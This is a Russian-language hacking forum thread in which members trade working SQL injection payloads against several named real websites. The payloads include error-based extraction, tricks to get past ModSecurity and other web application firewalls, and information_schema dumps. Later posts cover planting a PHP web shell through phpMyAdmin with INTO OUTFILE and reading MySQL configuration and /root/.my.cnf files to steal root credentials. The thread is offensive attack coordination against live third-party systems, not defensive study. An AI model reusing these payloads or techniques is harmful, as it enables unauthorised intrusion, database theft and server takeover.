Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    967
    Likes Received:
    119
    Reputations:
    25
    есть

    user() фильтрует, как я понял "table_name" фильтрует, мб кто подскажет что нибудь? :)

    PS много запросов не делайте часто, забанит
     
  2. wacky

    wacky Member

    Joined:
    30 Jan 2012
    Messages:
    42
    Likes Received:
    7
    Reputations:
    6
    Code:
    http://fumfie.com/category/4-2/?sort=sellers&brand=0&page=3'or(ExtractValue(1,concat(0x3a,(select(mid(group_concat(/*!table_name*/),1,31))from(information_schema.tables)))))='1
    
    http://fumfie.com/category/4-2/?sort=sellers&brand=0&page=3'or(ExtractValue(1,concat(0x3a,(select(mid(group_concat(/*!table_name*/),32,63))from(information_schema.tables)))))='1
    
     
    3 people like this.
  3. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    967
    Likes Received:
    119
    Reputations:
    25
    как обойти такую WAF?

    HTML:
    https://www.swallowtailfarms.com/store/?cat_id=43'+order+by+5+--+
    HTML:
    https://www.swallowtailfarms.com/store/?cat_id=43'+union(select(1,2,3,4))+--+
    фильтрует комбинацию union+select и concat
     
  4. madhatter

    madhatter Member

    Joined:
    7 Aug 2013
    Messages:
    577
    Likes Received:
    49
    Reputations:
    54
    Старая версия модсесурити. В скрипте два запроса подряд с разным количеством полей, 4 и 7.

    Code:
    /store/?cat_id=43'/*!50000union*/ /*!50000select*/ 1,2,3,4,5,6,7-- x
     
    2 people like this.
  5. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    967
    Likes Received:
    119
    Reputations:
    25

    а как дальше вот это обойти можно? :)

    HTML:
    https://www.swallowtailfarms.com//store/?cat_id=43'/*!50000union*/+/*!50000select*/+1,2,table_name,4,5,version(),7+from/**/information_schema.tables--%20
    
     
    #23685 Br@!ns, 9 Dec 2014
    Last edited: 9 Dec 2014
  6. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,682
    Likes Received:
    889
    Reputations:
    363
    докручивай через post запрос, там error-based.

    [​IMG]

    [​IMG]
     
    _________________________
    1 person likes this.
  7. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    967
    Likes Received:
    119
    Reputations:
    25
    Не получается обойти фильтр на слово information_schema.
    /*!information_schema*/ , dgsdginformation_schemasdgsdg, частичное и полное url кодирование не помогают, какие еще варианты есть?

    http://www.globekey.com/weblink/index.php?hid=USM5829k'+/*!50000union*/+/*!50000select*/+1,2,3,4,5,6,7,8,9,table_name,11,12,13,14,15,16+--+

    сайт банит ip при неудачных попытках
     
  8. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,709
    Likes Received:
    405
    Reputations:
    196
    Щас выложат и завтра уже залепят новый фильтр. А по сути реально способов обойти mod security и подобные WAF не так уж и много и почти все уже в фильтрах.
     
    2 people like this.
  9. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    967
    Likes Received:
    119
    Reputations:
    25
    не получается обойти waf с фильтром на union select, selecr from. какие решениея есть? мб етсь возможность составить запрос, гду from будет впереди select, или как нибудь по-другому??
    http://blogger.saibaba.us/cart.php?shopping_cart=yes&add2cart=1029+||@:=10+group+by+left(version(),@:=~@)having+min(0)
     
  10. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    824
    Likes Received:
    350
    Reputations:
    120
    http://blogger.saibaba.us/cart.php?shopping_cart=yes&add2cart=1029+or+1+group+by+concat((select+table_name+%0A+from+information_schema.tables+limit+1,1),floor(rand(0)*2))having+min(0)
    разбиваем запрос переносом строки
     
    3 people like this.
  11. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,682
    Likes Received:
    889
    Reputations:
    363
    Code:
    http://blogger.saibaba.us/cart.php?shopping_cart=yes&add2cart=1029||@:=10+group+by+left((select%23+faza%0Atable_name+from+information_schema.tables+limit+1,1),@:=~@)having+min(0)
     
    _________________________
    2 people like this.
  12. I love this game

    I love this game Elder - Старейшина

    Joined:
    23 Dec 2008
    Messages:
    182
    Likes Received:
    38
    Reputations:
    18
    Подскажите как можно залить шелл через phpmyadmin. Не root

    Есть пути, пробовал через SELECT '<?php system($cmd) ?>' INTO OUTFILE '/путь/shell.php'

    #1045 - Access denied for user 'user'@'localhost' (using password: YES)

    Версия MySQL-клиента: 5.1.73

    Пробовал вывести на страницы код php, но выводит как текст.

    Интересуют всевозможные способы.
     
    #23692 I love this game, 18 Dec 2014
    Last edited: 18 Dec 2014
  13. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    490
    Likes Received:
    168
    Reputations:
    126
    Никак, прав нету
     
    _________________________
  14. mazaxaka

    mazaxaka Elder - Старейшина

    Joined:
    15 Feb 2008
    Messages:
    424
    Likes Received:
    45
    Reputations:
    0
    без рута не как. так как нету прав на запить. сам когда то мучался пару месяцев. ищи в базе возможно есть база цмс какойто через которую можно залить
     
  15. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    712
    Likes Received:
    727
    Reputations:
    948
    Вы все неправы, можно залиться
    https://rdot.org/forum/showthread.php?t=741
     
    _________________________
  16. psihoz26

    psihoz26 Members of Antichat

    Joined:
    22 Nov 2010
    Messages:
    561
    Likes Received:
    159
    Reputations:
    324
    в топике нет ни слова про заливку
    только чтение
     
  17. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    А Вы головой подумайте.
     
  18. I love this game

    I love this game Elder - Старейшина

    Joined:
    23 Dec 2008
    Messages:
    182
    Likes Received:
    38
    Reputations:
    18
    Спасибо, если я правильно понял, ты ты намекаешь, на то что можно прочитать любые файлы. Если так, то работает, но вряд ли поможет залить шелл. Или же все-таки можно при помощи LOAD DATA INFILE как-то напрямую залить шелл? Я просто не силен в MySQL.
     
  19. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    490
    Likes Received:
    168
    Reputations:
    126
    Прочитай конфиги мускула и зайди уже из под рута.
     
    _________________________
    2 people like this.
  20. I love this game

    I love this game Elder - Старейшина

    Joined:
    23 Dec 2008
    Messages:
    182
    Likes Received:
    38
    Reputations:
    18
    Прочитал этот файл /etc/mysql/my.cnf
    Но пароля там нет.

    Пытаюсь этот прочитать
    LOAD DATA LOCAL INFILE '/root/.my.cnf' INTO TABLE mytable FIELDS TERMINATED BY '\n'

    Выдает ошибку.
    #13 - File '/root/.my.cnf' not found (Errcode: 13)



    Upd. Еще у меня есть форма входа в ISP Manager. Может от него можно как-то узнать логин и пас?
     
    #23700 I love this game, 18 Dec 2014
    Last edited: 19 Dec 2014
Loading...
Thread Status:
Not open for further replies.